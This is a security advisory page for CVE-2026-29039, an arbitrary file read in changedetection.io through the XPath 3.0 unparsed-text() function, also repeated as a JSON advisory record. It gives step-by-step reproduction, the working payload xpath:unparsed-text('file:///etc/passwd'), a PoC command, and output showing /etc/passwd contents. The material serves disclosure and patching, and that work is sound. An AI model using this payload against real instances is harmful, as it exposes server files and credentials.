GHSA-6FMW-82M7-JQ6P

Vulnerability from github – Published: 2026-03-04 20:59 – Updated: 2026-03-06 21:57
VLAI?
Summary
changedetection.io vulnerable to XPath - Arbitrary File Read via unparsed-text()
Details

Summary

  • The changedetection.io application allows users to specify XPath expressions as content filters via the include_filters field. These XPath expressions are processed using the elementpath library which implements XPath 3.0/3.1 specification.

  • XPath 3.0 includes the unparsed-text() function which can read arbitrary files from the filesystem. The application does not validate or sanitize XPath expressions to block dangerous functions, allowing an attacker to read any file accessible to the application process.

Data Flow

User Input (include_filters field)
    ↓
forms.py:ValidateCSSJSONXPATHInput() - Only validates syntax, NOT function safety
    ↓
Watch configuration stored in datastore
    ↓
Scheduled fetch triggers html_tools.py processing
    ↓
html_tools.py:xpath_filter() at line 213
    ↓
elementpath.select(root, xpath_expression, parser=XPath3Parser)
    ↓
XPath 3.0 unparsed-text('file:///etc/passwd') executed
    ↓
File contents returned as "filtered content"
    ↓
Stored as snapshot, viewable in UI

Affected Code File: changedetectionio/html_tools.py Function: xpath_filter() Lines: 187-220

def xpath_filter(xpath_filter, html_content, append_pretty_line_formatting=False, is_rss=False):
    # ...
    from elementpath import XPath3Parser  # XPath 3.0 with dangerous functions
    # ...
    r = elementpath.select(root, xpath_filter.strip(), parser=XPath3Parser)  # Line 213

Validation (forms.py):

class ValidateCSSJSONXPATHInput:
    def __call__(self, form, field):
        # Only checks if XPath is syntactically valid
        # Does NOT check for dangerous functions like unparsed-text()

Details

  • Navigate to the http://ewn9c0k01ghh7f588a7mij4y1w6iz8gb.tryneoai.com:5000/ instance
  • Create a new watch with any valid URL (e.g., https://example.com)
  • Edit the watch and set the "CSS/JSONPath/JQ/XPath Filters" field to:
xpath:unparsed-text('file:///etc/passwd')
  • Save and trigger a recheck
  • View the preview/snapshot - the file contents will be displayed

image

PoC

python script for easy reproduction: https://gist.githubusercontent.com/DhiyaneshGeek/27a6239f34023d43a0b89afb05edc5d2/raw/76d2b1f035164298d57699741eb79a8376f4ed47/poc_xpath_file_read.py

python3 poc_xpath_file_read.py http://ewn9c0k01ghh7f588a7mij4y1w6iz8gb.tryneoai.com:5000 /etc/passwd

╔═══════════════════════════════════════════════════════════════╗
║  XPath 3.0 Arbitrary File Read Exploit                        ║
║  Target: changedetection.io                                   ║
║  Vulnerability: unparsed-text() in XPath filters              ║
╚═══════════════════════════════════════════════════════════════╝

[*] Creating new watch for https://example.com...
[+] Watch created with UUID: 5215b704-809c-4218-952b-aad9b6ee41e1
[*] Setting XPath filter to read: /etc/passwd
[+] XPath filter set successfully
[*] Triggering recheck...
[*] Waiting for check to complete...
[*] Retrieving file contents...

[+] SUCCESS! File contents retrieved:
============================================================
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin _apt:x:42:65534::/nonexistent:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin

============================================================
[*] Cleaning up (deleting watch)...

Impact

  • Read any file accessible to the application process
  • Exfiltrate sensitive configuration files, credentials, API keys
  • Read application source code
  • Access database files if file-based (SQLite)
Severity ?
8.8 (High)
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P
Show details on source website
To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.54.3"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "changedetection.io"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.54.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-29039"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-94"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-04T20:59:35Z",
    "nvd_published_at": "2026-03-06T07:16:01Z",
    "severity": "HIGH"
  },
  "details": "### Summary\n- The changedetection.io application allows users to specify XPath expressions as content filters via the include_filters field. These XPath expressions are processed using the elementpath library which implements XPath 3.0/3.1 specification.\n\n- XPath 3.0 includes the unparsed-text() function which can read arbitrary files from the filesystem. The application does not validate or sanitize XPath expressions to block dangerous functions, allowing an attacker to read any file accessible to the application process.\n\n\n### Data Flow\n\n```\nUser Input (include_filters field)\n    \u2193\nforms.py:ValidateCSSJSONXPATHInput() - Only validates syntax, NOT function safety\n    \u2193\nWatch configuration stored in datastore\n    \u2193\nScheduled fetch triggers html_tools.py processing\n    \u2193\nhtml_tools.py:xpath_filter() at line 213\n    \u2193\nelementpath.select(root, xpath_expression, parser=XPath3Parser)\n    \u2193\nXPath 3.0 unparsed-text(\u0027file:///etc/passwd\u0027) executed\n    \u2193\nFile contents returned as \"filtered content\"\n    \u2193\nStored as snapshot, viewable in UI\n\n```\n\n**Affected Code**\n**File:** changedetectionio/html_tools.py\n**Function:** xpath_filter()\n**Lines:** 187-220\n\n```\ndef xpath_filter(xpath_filter, html_content, append_pretty_line_formatting=False, is_rss=False):\n    # ...\n    from elementpath import XPath3Parser  # XPath 3.0 with dangerous functions\n    # ...\n    r = elementpath.select(root, xpath_filter.strip(), parser=XPath3Parser)  # Line 213\n\n```\n\nValidation (forms.py):\n\n```\nclass ValidateCSSJSONXPATHInput:\n    def __call__(self, form, field):\n        # Only checks if XPath is syntactically valid\n        # Does NOT check for dangerous functions like unparsed-text()\n\n```\n\n### Details\n\n- Navigate to the http://ewn9c0k01ghh7f588a7mij4y1w6iz8gb.tryneoai.com:5000/ instance\n- Create a new watch with any valid URL (e.g., https://example.com)\n- Edit the watch and set the \"CSS/JSONPath/JQ/XPath Filters\" field to:\n\n```\nxpath:unparsed-text(\u0027file:///etc/passwd\u0027)\n```\n\n- Save and trigger a recheck\n- View the preview/snapshot - the file contents will be displayed\n\n\u003cimg width=\"2800\" height=\"1108\" alt=\"image\" src=\"https://github.com/user-attachments/assets/f39df9c3-52c9-4fa8-ab57-75c7d4955017\" /\u003e\n\n### PoC\n\npython script for easy reproduction: https://gist.githubusercontent.com/DhiyaneshGeek/27a6239f34023d43a0b89afb05edc5d2/raw/76d2b1f035164298d57699741eb79a8376f4ed47/poc_xpath_file_read.py\n\n```\npython3 poc_xpath_file_read.py http://ewn9c0k01ghh7f588a7mij4y1w6iz8gb.tryneoai.com:5000 /etc/passwd\n\n\u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\n\u2551  XPath 3.0 Arbitrary File Read Exploit                        \u2551\n\u2551  Target: changedetection.io                                   \u2551\n\u2551  Vulnerability: unparsed-text() in XPath filters              \u2551\n\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d\n    \n[*] Creating new watch for https://example.com...\n[+] Watch created with UUID: 5215b704-809c-4218-952b-aad9b6ee41e1\n[*] Setting XPath filter to read: /etc/passwd\n[+] XPath filter set successfully\n[*] Triggering recheck...\n[*] Waiting for check to complete...\n[*] Retrieving file contents...\n\n[+] SUCCESS! File contents retrieved:\n============================================================\nroot:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin _apt:x:42:65534::/nonexistent:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n\n============================================================\n[*] Cleaning up (deleting watch)...\n\n```\n\n\n### Impact\n- Read any file accessible to the application process\n- Exfiltrate sensitive configuration files, credentials, API keys\n- Read application source code\n- Access database files if file-based (SQLite)",
  "id": "GHSA-6fmw-82m7-jq6p",
  "modified": "2026-03-06T21:57:13Z",
  "published": "2026-03-04T20:59:35Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/dgtlmoon/changedetection.io/security/advisories/GHSA-6fmw-82m7-jq6p"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29039"
    },
    {
      "type": "WEB",
      "url": "https://github.com/dgtlmoon/changedetection.io/commit/417d57e5749441e4be9acc4010369bded805d66f"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/dgtlmoon/changedetection.io"
    },
    {
      "type": "WEB",
      "url": "https://github.com/dgtlmoon/changedetection.io/releases/tag/0.54.4"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P",
      "type": "CVSS_V4"
    }
  ],
  "summary": "changedetection.io vulnerable to XPath - Arbitrary File Read via unparsed-text()"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.